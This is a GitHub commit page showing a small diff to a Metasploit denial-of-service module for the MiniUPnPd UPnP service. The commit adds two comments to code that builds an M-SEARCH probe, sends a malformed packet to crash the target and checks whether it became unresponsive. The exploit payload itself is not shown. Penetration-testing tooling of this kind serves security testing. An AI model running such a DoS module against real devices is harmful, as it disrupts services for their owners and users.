We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent ec52795 commit 154894bCopy full SHA for 154894b
modules/auxiliary/dos/upnp/miniupnpd_dos.rb
@@ -53,6 +53,7 @@ def send_probe(udp_sock, probe)
53
end
54
55
def run
56
+ # the M-SEARCH probe packet that tries to identify whether the service is up or not
57
msearch_probe = "M-SEARCH * HTTP/1.1\r\n"
58
msearch_probe << "Host:239.255.255.250:1900\r\n"
59
msearch_probe << "ST:upnp:rootdevice\r\n"
@@ -89,6 +90,7 @@ def run
89
90
print_status("#{rhost}:#{rport} - Sending malformed packet...")
91
udp_sock.put(sploit)
92
93
+ # send the probe to the target
94
print_status("#{rhost}:#{rport} - The target should be unresponsive now...")
95
response = send_probe(udp_sock, msearch_probe)
96
if response.nil?
0 commit comments